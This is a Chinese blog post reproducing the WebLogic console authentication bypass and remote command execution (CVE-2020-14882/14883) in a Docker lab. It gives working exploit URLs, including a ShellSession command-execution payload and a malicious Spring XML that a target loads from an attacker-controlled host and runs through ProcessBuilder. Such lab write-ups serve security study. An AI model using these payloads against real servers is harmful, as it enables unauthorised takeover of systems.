CVE-2020-14882&14883:weblogic 未授权命令执行漏洞复现

最新推荐文章于 2024-05-14 10:45:34 发布
置顶 最新推荐文章于 2024-05-14 10:45:34 发布
阅读量1.7k 收藏 5
点赞数
分类专栏: 漏洞学习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jietewang/article/details/110426657
版权

目录

 

1.Weblogic简介

2.漏洞描述

3.漏洞影响

4.环境搭建

4.1 使用docker搭建靶机

4.2 漏洞复现

5.漏洞分析

5.1 搭建调试环境

1.Weblogic简介

Oracle WebLogic Server是用于构建和部署企业Java EE应用程序的业界最佳应用程序服务器,并支持新功能,这些新功能可降低运营成本,提高性能,增强可伸缩性并支持Oracle Applications产品组合。

这是一个Java的中间件,本人是这么理解的那要想更加详细的理解请查看官方介绍【官方介绍】。

2.漏洞描述

复现漏洞编号CVE-2020-14882,CVE-2020-14883

可以构造特殊的HTTP请求,在未经身份验证的情况下访问Weblogic Server Console,并且还能执行任意代码。

3.漏洞影响

weblogic 10.3.6.0.0

weblogic 12.1.3.0.0

weblogic 12.2.1.3.0

weblogic 12.2.1.4.0

weblogic 14.1.1.0.0

4.环境搭建

搭建WeblogicServer的环境可以尝试下载官方提供的应用,在本地搭建,本地搭建需要JAVA环境。至于教程请自行百度!

下载地址:https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

在本次复现实验里直接采用docker环境,使用vulhub环境,可以直接复现,会省去很多步骤。复现环境使用12.2.1.3-2018 tag镜像。

4.1 使用docker搭建靶机

获取镜像

docker pull vulhub/weblogic:12.2.1.3-2018

创建一个容器,并且将容器的端口映射到宿主机的端口

docker run -di -p 7001:7001 -p 8055:8055 vulhub/weblogic:12.2.1.3-2018

启动成功后使用浏览器访问

4.2 漏洞复现

使用POC进行越权,利用该url可以直接访问到管理后台页面

http://192.168.204.142:7001/console/css/%252e%252e%252fconsole.portal

此时获取的权限是一个低权限用户,到这一步还无法执行命令,此时就要结合CVE-2020-14883,利用该漏洞可以通过http协议使后台任意用户执行任意命令。作为攻击者可以构造特殊的HTTP请求,在未验证身份的情况下执行任意代码。

在此提供两种该漏洞的利用方式

方法一:利用com.tangosol.coherence.mvel2.sh.ShellSession 

执行poc如下:

http://192.168.204.142:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/pocIsok%27);%22);

需要注意的是执行完poc后的页面回显为404,也表示命令执行成功了,我看有大佬的文章抓包获取到的回显结果为302,可能是靶机的环境有细微的区别。 

结果截图 

 方法二:利用com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

本方法对所有的Weblogic版本均有效,前提是需要有一个公网的vps,搭建临时的http服务,构建恶意的xml,并保证能狗访问。建议使用python临时开启http服务。

构造的恶意xml内容:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[curl i368cj.dnslog.cn]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

 通过DNSlog平台查看回显,执行POC加载vps上的xml,执行其中的命令

http://127.0.0.1:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://XX.XX.XX.XX:8085/weblogic/evil.xml%22)

 查看回显

5.漏洞分析

5.1 搭建调试环境

首先需要开启远程调试环境,进入docker容器内部修改setDomainEnv.sh,在docker里需要将该文件复制到宿主机内,然后再拷贝进去。

参考链接:https://mp.weixin.qq.com/s/oVL9D69Xrdoez6T-sheJLg

Jietewang
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic授权命令执行漏洞(CVE-2020-14882-14883)
m0_48520508的博客
11-10 8257
0x00简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 Weblogic对比Tomcat 0x01漏洞概述 CVE-2020-14882: 代码执行漏洞 远程攻击者可以构造特殊的HTTP请求,在经身份
cve_2020_14883.zip
05-28
weblogic 解决CVE-2020-14883漏洞
weblogic权限绕过漏洞(CVE-2020-14883)
m0_65150886的博客
12-27 450
2.访问http://ip:port/console/images/%252E%252E%252Fconsole.portal?1.访问http://ip:port/console。
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883
最新发布
weixin_45653478的博客
05-14 916
Weblogic Pre-Auth Remote Command Execution 漏洞CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6086
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
weblogic权限绕过CVE-2020-14482&远程命令执行漏洞CVE-2020-14883
weixin_44912035的博客
01-02 884
漏洞危害 CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在经身份验证的情况下接管 WebLogic 管理控制台。 CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个HTTP请求在远程Weblogic服务器上以授权的任意用户身份执行命令。 影响版本 Weblogic : 10.3.6.0.0 Weblogic : 12.1.3.0.0 Weblogic : 12.2.1.3.0 Weblogic : 12.2.1.4.0
weblogic权限绕过/远程命令执行漏洞复现CVE-2020-14482、CVE-2020-14883
LuckySec
12-03 7074
0x01 漏洞简介 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在经身份验证的情况下接管 WebLogic 管理控制台。 CVE-2020-14883:允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个HTTP请求
Weblogic授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1585
weblogic漏洞复现
Weblogic_CVE-2020-14882/14883
jh035512的博客
11-15 144
方式2:构造XML文件,将XML文件保存在weblogic可以访问的服务器上,通过修改url连接,访问到固定的XML文件,XML文件上带有执行命令经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。#方式 1 : 利用访问XML文件方式,进行远程shell。
CVE-2020-14882&14883 Weblogic 管理控制台授权远程命令执行漏洞复现
ierciyuan的博客
07-30 986
CVE-2020-14882&14883Weblogic管理控制台授权远程命令执行漏洞复现。提供相关软件包(网盘)
【Vulhub漏洞复现Weblogic(CVE-2020-14882)漏洞复现
一剑开天门!的博客
02-22 1728
【Vulhub漏洞复现Weblogic(CVE-2020-14882)漏洞复现
vulhub漏洞Weblogic管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883
weixin_45808483的博客
12-20 2837
Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以授权的任意用户身份执行命令漏洞环境
Weblogic授权远程命令执行漏洞CVE-2020-14882&CVE-2020-14883复现
weixin_44533592的博客
03-05 1067
Weblogic授权远程命令执行漏洞CVE-2020-14882&CVE-2020-14883复现 ​ – 因果 2021.3.5 漏洞简介 Weblogic是Oracle公司推出的J2EE应用服务器,CVE-2020-14882允许授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务
CVE-2020-14882&14883weblogic授权命令执行漏洞复现
蚁景网安学院
12-08 2282
亲爱的,关注我吧12/8本文字数2498来和我一起阅读吧本文涉及靶场知识点-CVE-2020-14882&14883 weblogic授权访问漏洞https://www.het...
CVE-2020-14882Weblogic Console 权限绕过深入解析
爱国小白帽
11-05 6138
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-110501 报告来源:360CERT 报告作者:Hu3sky 更新日期:2020-11-05 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC 已经公开,相关漏洞编号为 CVE-2020-14882,CVE-2020-14883漏洞等级:严重 ,漏洞评分:9.8 。 远程攻击者可以构
Weblogic 管理控制台授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)漏洞复现
weixin_70045024的博客
09-18 1611
Weblogic
CVE-2020-14882/14883: Weblogic ConSole HTTP 协议代码执行漏洞通告
爱国小白帽
10-29 3636
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-102901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-29 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞 相关 POC已经公开,该漏洞编号为 CVE-2020-14882,CVE-2020-14883漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HT
[更新1.0:补丁绕过]CVE-2020-14882: Weblogic Console HTTP 远程代码执行漏洞通告
爱国小白帽
10-30 1810
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-103001 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-30 0x01 漏洞简述 2020年10月30日,360CERT监测发现Oracle官方的 CVE-2020-14882 Weblogic 代码执行漏洞 最新补丁可被绕过,该漏洞编号为 CVE-2020-14882漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在
Weblogic RCE漏洞CVE-2020-14882&14883复现与影响版本解析
近期,两个关键性漏洞 CVE-2020-14882CVE-2020-14883 被发现,这些漏洞的存在使得授权的远程攻击者能够通过精心构造的GET请求,在受影响的Weblogic Server上执行任意代码。这两个漏洞影响了多个版本,包括...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值